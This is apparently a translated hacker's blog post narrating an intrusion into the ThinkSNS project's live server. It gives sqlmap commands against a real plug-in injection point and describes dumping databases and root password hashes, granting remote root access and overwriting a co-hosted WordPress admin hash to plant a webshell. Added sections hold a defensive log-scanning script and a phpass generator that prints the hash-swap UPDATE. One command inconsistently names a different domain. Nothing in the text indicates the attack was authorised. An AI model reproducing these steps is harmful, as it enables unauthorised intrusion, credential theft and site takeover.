(All vulnerabilities covered in this article have since been fixed!)
(Because the article was written up after the fact, some screenshots could not be captured. Sorry.)
ThinkSNS (TS) is an open-source microblog (Weibo) engine.
I had been reading the ThinkSNS code for a long time without finding any substantive vulnerability, because their code quality is quite high.
Then one day on 90sec I saw someone post a ThinkSNS injection 0day. It was an injection in one of the plug-ins; the injection point: index.php?app=blog&mod=Index&act=show&id=2211. That gap got me fired up, and an evil idea took shape.....
-------------------- Split line ------------------------
0x01 Nmap lights the road ahead
nmap -sS -sU -T4 -A -v thinksns.com
One of my favourite option sets; it has decent speed.
Linux server, Apache.
Ha, a LAMP stack.
And 3306 was open, plain as day.
Hmm, a local MySQL.
Beyond that, nothing else was collected.....
0x02 Sqlmap shows its might
http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211
With the injection point in hand, and racing against the administrator, I went straight to sqlmap!
# sqlmap.py -u "http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211"
It echoes back the database version.
Good, it's injectable!
# sqlmap.py -u "http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211" --dbs
List all databases.
Oh, great!
One t_thinksns
One thinksns
The database of a WordPress blog
And several other small databases.
So I went straight for the t_thinksns database:
# sqlmap.py -u "http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211" --tables -D t_thinksns
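On the defender's side, a run like the above leaves a very recognisable trail in the web server log: a burst of requests to the same index.php?app=blog&mod=Index&act=show&id= URL in which the id value is no longer a plain integer, and, unless the attacker changed it, sqlmap's default User-Agent. The following is an added example, not code from the original post or from ThinkSNS, that scans Apache combined-format access log lines for exactly that. The request path is assumed to be the post's injection point; the log lines, IP addresses, timestamps, payloads and User-Agent strings in SAMPLE_LOG are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example: spot sqlmap-style probing of the ThinkSNS blog injection
# point in Apache "combined" access logs. Not code from the original post
# or from ThinkSNS. The URL pattern is the post's; everything in SAMPLE_LOG
# (IPs, timestamps, User-Agent strings, payloads) is constructed.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The vulnerable handler: in legitimate traffic id is always a plain integer.
INJECT_PATH = "/index.php"
INJECT_QUERY = {"app": "blog", "act": "show"}

SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2013:15:41:02 +0800] "GET /index.php?app=blog&mod=Index&act=show&id=2211 HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) Firefox/17.0"
203.0.113.5 - - [12/Jan/2013:15:41:03 +0800] "GET /index.php?app=blog&mod=Index&act=show&id=2211%27 HTTP/1.1" 500 1420 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [12/Jan/2013:15:41:03 +0800] "GET /index.php?app=blog&mod=Index&act=show&id=2211%20AND%201%3D1 HTTP/1.1" 200 8123 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [12/Jan/2013:15:41:04 +0800] "GET /index.php?app=blog&mod=Index&act=show&id=2211%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%28user%2Cpassword%29%20FROM%20mysql.user-- HTTP/1.1" 200 9002 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/23.0"
198.51.100.7 - - [12/Jan/2013:15:45:10 +0800] "GET /index.php?app=blog&mod=Index&act=show&id=17 HTTP/1.1" 200 7011 "-" "Mozilla/5.0 (Macintosh) Safari/536.26"
"""


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes, so %27 / %20 payloads come back as the real characters
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like injection probing (empty if clean)."""
    reasons = []
    q = rec["query"]
    hits_endpoint = rec["path"].endswith(INJECT_PATH) and all(
        q.get(k) == [v] for k, v in INJECT_QUERY.items()
    )
    if hits_endpoint:
        for raw in q.get("id", []):
            if not raw.isdigit():              # anything but digits is tampering
                reasons.append("non-numeric id: " + raw)
    if "sqlmap" in rec["ua"].lower():          # default UA unless --random-agent was used
        reasons.append("sqlmap user-agent")
    return reasons


def analyze(log_text):
    """Scan log text; return one finding per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "time": rec["ts"],
                             "status": int(rec["status"]), "reasons": reasons})
    return findings


def suspicious_ips(findings):
    """Distinct source addresses, for blocking or correlating with the MySQL general log."""
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for f in hits:
        print(f["time"], f["ip"], f["status"], "; ".join(f["reasons"]))
    print("sources:", ", ".join(suspicious_ips(hits)))
```

The UNION request in the sample deliberately carries a browser User-Agent: the id check catches it anyway, which is the point. A plain integer cast on id in the application (or a prepared statement) would have made the whole post impossible; the log check is what you run when you suspect it was not there.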
Step by step towards the password.
Honestly, if it were just an injection, a manual union select would certainly be faster, but my laptop runs Ubuntu and there is no encoding tool like Xiaokui on it; the Burp Suite encoder could do the conversion, but I don't like using it.
Got the password hash. Started cracking it.....
Partway through I noticed another guy had beaten me to it moments earlier; sites like this don't stay untouched for long...
I paged through many search results and still could not find the admin backend.
(Here I could also have used the so.360.cn search engine, which indexes a lot of admin backends and ignores robots.txt.)
Then:
# sqlmap.py -u "http://www.2cto.com/index.php?app=blog&mod=Index&act=show&id=2211" --users
Try enumerating the MySQL users.
Honestly I was in a hurry, so I just went for it to see whether I could get them; I don't normally bother checking what privileges the injection runs with.
To my delight, I got several root users and a t_thinksns user (presumably the account the injected query runs as), plus a few others I don't remember.
# sqlmap.py -u "http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211" --passwords
Got the root password hash! Those are huge privileges.
So I wanted to write a shell directly.
But the web root path was nowhere to be found.
Google hacking turned up no error pages either, damn...
So, on to cracking the root hash.
The hash cracked successfully --
Lucky!
The password: ts**00
Then, decisively:
# sqlmap.py -u "http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211" --sql-shell
That gives an interactive SQL shell.
system vi /etc/httpd/conf/httpd.conf;
I still wanted the path; writing a shell is only safe once you know it....
The interaction is poor and nothing is echoed back.
(Caveat: `system` is a command of the mysql command-line client and runs on the client machine; it is not SQL. Sent through sqlmap's --sql-shell it never reaches the server, so it cannot reveal the server's httpd.conf.)
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'ts**00' WITH GRANT OPTION;
Enable remote connections.
I don't know whether it succeeded --
During this period I also tried running it through Metasploit; I'm not sure which one actually did the job.
At this point sqlmap seemed to have lost its charm --
0x03 Continuing on Windows
With root in hand I immediately switched to Windows.
After all, that's more familiar.
First I tried Navicat.
Connected successfully; it seems enabling remote connections did work.
Then, again, vi...
Executed "successfully", but with no output.
Based on experience, I put it down to the poor interactivity.
Switched to the mysql command-line client.
It read it.
(Note for anyone repeating this: the mysql client's `system` command executes on the machine running the client, never on the server, so it cannot read the server's config; reading server files needs the FILE privilege on the server, e.g. via LOAD_FILE().)
This part was done with War Tiger's help; my own mysql install seemed broken:
Flight 15:42:29
Try the system function.
War Tiger 15:42:28
Try another environment.
War Tiger 15:42:40
The mysql you installed is broken.
Flight 15:42:43
--
Flight 15:42:47
AppServ
Flight 15:42:50
Inheritance
War Tiger 15:42:52
..
War Tiger 15:42:57
Mine too.
But I still had no permission to write into the web directory. The permissions were set up really well!!
0x04
Suddenly stuck...
What to do?
Then it hit me: there were lots of other sites on the same server, including a blog, and I got excited!!
* Actually forcing out the path
Better still, just open the site in Google Chrome and request a nonexistent linux.php to trigger an error page that leaks the path (a trick from War Tiger).
Then Navicat found the blog's database directly.
The password hash was very strong,
but no matter: if the hash can't be cracked, we set up a WordPress blog locally,
generate a password hash with it, overwrite the one in the database,
and restore the original afterwards!!!
The WP admin backend is generally pretty dumb, and getting a shell from the backend is boring, so I'll skip that part!
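Setting up a whole WordPress install just to obtain one password hash is unnecessary: WordPress stores phpass "portable" hashes (the $P$B... strings in wp_users.user_pass), and that algorithm is public and small. The following is an added example, not code from the original post, ThinkSNS or WordPress, that reimplements it in Python so a replacement hash can be generated and the original verified offline; the function names, the sample passwords and the user_login value in the demo are my own. It also makes the post's own advice concrete: keep the original hash so it can be put back afterwards.

```python
import hashlib
import hmac
import os
from typing import Optional

# Added example: phpass "portable" hashes as used by WordPress (wp_users.user_pass).
# Not code from the original post, ThinkSNS or WordPress; it reimplements the
# public phpass algorithm (iterated MD5 over salt+password) so that a hash can be
# generated and checked offline, without installing WordPress locally.

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes, count: int) -> str:
    """phpass' own base64 variant: little-endian, 6 bits per output character."""
    out = []
    i = 0
    while True:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def _crypt_private(password: bytes, setting: str) -> str:
    """Core of phpass: salt and iteration count are read from the first 12 chars of the setting."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        return "*0"                       # phpass returns a value that can never match
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return "*0"
    salt = setting[4:12].encode()
    digest = hashlib.md5(salt + password).digest()
    for _ in range(1 << count_log2):       # 2**count_log2 further rounds
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)


def hash_password(password: str, count_log2: int = 8,
                  salt_bytes: Optional[bytes] = None) -> str:
    """Generate a WordPress-compatible hash. wp_hash_password() uses cost 8 and trims the password."""
    if salt_bytes is None:
        salt_bytes = os.urandom(6)        # 6 random bytes -> 8 salt characters
    # phpass stores count_log2 + 5 in the 4th character; 8 + 5 = 13 -> 'B', hence "$P$B..."
    setting = "$P$" + ITOA64[min(count_log2 + 5, 30)] + _encode64(salt_bytes, 6)
    return _crypt_private(password.strip().encode(), setting)


def check_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost, compare in constant time."""
    computed = _crypt_private(password.encode(), stored)
    return hmac.compare_digest(computed.encode(), stored.encode())


if __name__ == "__main__":
    # The post's workflow, offline: keep the original hash, install a new one, restore it later.
    original_user_pass = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"   # phpass test vector for 'test12345'
    replacement = hash_password("temporary-pass-2013")          # password chosen for the demo
    print("UPDATE wp_users SET user_pass='%s' WHERE user_login='admin';" % replacement)
    print("restore afterwards with:", original_user_pass)
```

A WordPress hash is 34 characters: "$P$B", an 8-character salt, then 22 characters encoding the 16-byte MD5 state after 2^13 = 8192 rounds. Because the salt is random, two hashes of the same password differ; the only way to compare is check_password, which is why a cracker has to grind each hash separately and why the post's "generate a new one and swap it in" route is the practical one when the original will not crack.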
Finally, shell obtained!!!
Then cross-directory into the target!
Oh yes!!
As for privilege escalation, that needs an exploit, and a noob like me couldn't pull it off.
Here I'm very grateful to War Tiger. His experience and sincerity really moved me. With you, the road of penetration testing shines all the brighter.